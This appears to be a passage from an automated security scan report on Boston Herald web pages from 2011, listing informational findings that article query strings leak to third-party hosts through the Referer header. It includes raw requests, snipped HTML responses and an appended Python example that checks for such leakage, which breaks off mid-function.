<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/international/africa/view.bg?articleid=1312633&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/international/africa/view.bg?articleid=1312633&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/international/africa/view.bg?articleid=1312633&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(24) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Egyptian President Mubarak asks Cabinet to resign');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</p>
<iframe src="http://widget.newsinc.com/single.htm?WID=2&VID=23316506&freewheel=90017&sitesection=bostonherald" height=320 width=425 frameborder=no scrolling=no noresize marginwidth=0px marginheight=0px></iframe>
...[SNIP]...
<a href="/news/international/africa/view.bg?articleid=1312633&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(24) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/097956_ltpEgyptC012811.jpg" alt="An anti-government protester burns..." /></div>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="President Obama tells Mubarak: Must take &lsquo;concrete steps" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.281. http://www.bostonherald.com/news/national/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view.bg

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; the third-party script, image, iframe and anchor targets are visible in the response body below. When the browser fetches those resources, or the user follows those links, it sends the page URL, query string included, in the Referer header, so the query string (here articleid) is disclosed to those domains.

Request

GET /news/national/general/view.bg?articleid=1312579 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Around the Nation - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/national/general/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2Fgeneral%2Fview.bg%3Farticleid%3D1312579%26srvc%3Dnext_article&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/national/general/view.bg?articleid=1312579&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/national/general/view.bg?articleid=1312579&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/national/general/view.bg?articleid=1312579&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(6) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Ronald Reagan&rsquo;s memorable speech on Challenger disaster');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<div id="articleFull" class="articleFull"><iframe src="http://widget.newsinc.com/single.htm?WID=2&VID=23316276&freewheel=90017&sitesection=bostonherald" height=320 width=425 frameborder=no scrolling=no noresize marginwidth=0px marginheight=0px></iframe>
...[SNIP]...
<a href="/news/national/general/view.bg?articleid=1312579&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(6) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/62fc53_rreagan012811.jpg" alt="his Jan. 28, 1986 file picture shows..." /></div>
...[SNIP]...
<a href="/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/da98aa_Shuttle_01282011.jpg" alt="Remembering the Challenger&rsquo;s haunting explosion" /></a>
...[SNIP]...
<a href="/news/national/general/view/20110127challenger_25_years_later_a_still_painful_wound/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5dffd7_ltpchallenger.jpg" alt="Challenger: 25 years later, a still painful wound" /></a>
...[SNIP]...
<a href="/news/national/general/view/20110125giffords_husband_weighing_decision_on_shuttle/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb1497_ltpmkelly.jpg" alt="Gifford&rsquo;s husband weighing decision on shuttle" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.282. http://www.bostonherald.com/news/offbeat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/offbeat/

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; the third-party script, image, iframe and anchor targets are visible in the response body below. When the browser fetches those resources, or the user follows those links, it sends the page URL, query string included, in the Referer header, so the query string (here srvc and position) is disclosed to those domains.

Request

GET /news/offbeat/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:33:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Offbeat News - News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/offbeat/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Foffbeat%2F%3Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/offbeat/view/20110126hawk_trapped_in_library_of_congress_finally_caught/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5a9493_hawk.jpg" alt="In this handout photo provided by the Library of Congress, a juvenile female Cooper&#x2019;s hawk is shown in the Main Reading Room in the Jefferson Building at the Library of Congress, Friday, in Washington."></a>
...[SNIP]...
<a href="/news/offbeat/view/20110125grand_piano_found_on_sandbar_in_miami_bay/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/41ffa0_ltpPianoBay012511.jpg" alt="A U.S. Coast Guard boat passes near a grand piano on a sandbar in Biscayne Bay, Tuesday, Jan. 25, 2011 in Miami."></a>
...[SNIP]...
<a href="/news/offbeat/view/20110125chicago_car_salesman_fired_for_wearing_packers_tie/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/5a4b42_pack.jpg" alt="In this Jan. 24, 2011 photo, John Stone of Chicago wears a Green Bay Packers tie. "></a>
...[SNIP]...
<a href="/news/offbeat/view/20110115lego-lover_builds_ohio_state_stadium_replica/"><img src="http://multimedia.heraldinteractive.com/images/20110115/stp/3f0a52_legos01162011.jpg" alt="Paul Janssen poses for a portrait inside his detailed Ohio Stadium made of Legos in his basement on Jan. 13, 2011 in Dublin, Ohio."></a>
...[SNIP]...
<!--//include 8 //-->


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.283. http://www.bostonherald.com/news/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; the third-party script, image, iframe and anchor targets are visible in the response body below. When the browser fetches those resources, or the user follows those links, it sends the page URL, query string included, in the Referer header, so the query string (here srvc and position) is disclosed to those domains.
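The check behind findings 17.280 to 17.283, written out as an added example (this is editor-supplied code, not the crawler's own implementation). It parses a captured response body, collects every host other than the page's own that the page references, and reports which of those hosts would see the page URL, query string included, in the Referer header. The sample HTML is a constructed, condensed version of the 17.280 response body shown in the report. The policy model goes beyond what the 2011 scan could check: the Referrer-Policy keywords postdate this report, and "no-referrer-when-downgrade" is used here as the assumed legacy browser default (full URL minus fragment, suppressed only on an https to http transition).

```python
"""Cross-domain Referer leakage check (added example, not the scanner's code).

Finds third-party hosts referenced by a page and reports which of them receive
the page's query string via the Referer header under a given Referrer-Policy.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Page URL from finding 17.280 (request line plus Host header).
PAGE_URL = ("http://www.bostonherald.com/news/international/africa/view.bg"
            "?articleid=1312633&pos=breaking")

# Constructed sample: a condensed version of the captured response body.
SAMPLE_HTML = """
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6151562" style="display:none" alt="" /></noscript>
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif"></a>
<a class="alt" href="javascript:void(0);">Features</a>
<a href="/news/international/africa/view.bg?articleid=1312633&amp;format=text">Print</a>
<a href="http://www.homefind.com/">Homefind</a>
<iframe src="http://widget.newsinc.com/single.htm?WID=2&amp;VID=23316506"></iframe>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
"""


class _RefCollector(HTMLParser):
    """Collects (tag, attribute, absolute URL) for every URL-bearing attribute."""

    URL_ATTRS = ("src", "href", "action")

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.URL_ATTRS and value:
                self.refs.append((tag, name, urljoin(self.base_url, value)))


def third_party_refs(page_url, html):
    """Return {host: [(tag, attr, url), ...]} for hosts other than the page's own."""
    own = urlsplit(page_url).hostname
    collector = _RefCollector(page_url)
    collector.feed(html)
    out = {}
    for tag, attr, url in collector.refs:
        parts = urlsplit(url)
        # Skip javascript:, mailto:, fragment-only and same-host references.
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        if parts.hostname == own:
            continue
        out.setdefault(parts.hostname, []).append((tag, attr, url))
    return out


def referer_sent(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Referer value sent for target_url when loaded from page_url, or None.

    Assumption: modern Referrer-Policy semantics; the default keyword models
    the legacy browser behaviour in force when this report was generated.
    """
    page, target = urlsplit(page_url), urlsplit(target_url)
    full = page_url.split("#", 1)[0]          # fragment is never sent
    origin = f"{page.scheme}://{page.netloc}/"
    same_origin = (page.scheme, page.netloc) == (target.scheme, target.netloc)
    downgrade = page.scheme == "https" and target.scheme == "http"
    if policy == "no-referrer":
        return None
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin":
        return origin
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return full
        return None if downgrade else origin
    raise ValueError(f"unknown policy: {policy}")


def leakage_report(page_url, html, policy="no-referrer-when-downgrade"):
    """Hosts that receive the page's query string: "automatic" for resources
    fetched on page load (src attributes), "on-click" for followed links."""
    query = urlsplit(page_url).query
    if not query:
        return {}
    leaked = {}
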